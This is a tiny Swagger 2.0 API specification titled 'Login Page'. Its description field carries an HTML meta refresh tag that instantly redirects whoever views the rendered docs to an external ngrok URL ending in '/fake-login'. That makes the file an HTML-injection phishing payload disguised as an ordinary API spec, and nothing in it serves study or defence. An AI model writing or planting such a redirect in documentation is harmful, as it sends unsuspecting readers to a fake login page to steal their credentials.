swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: >
    <meta http-equiv='refresh' content='0;url= https://agelong-susurrant-zayne.ngrok-free.dev/fake-login'>
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
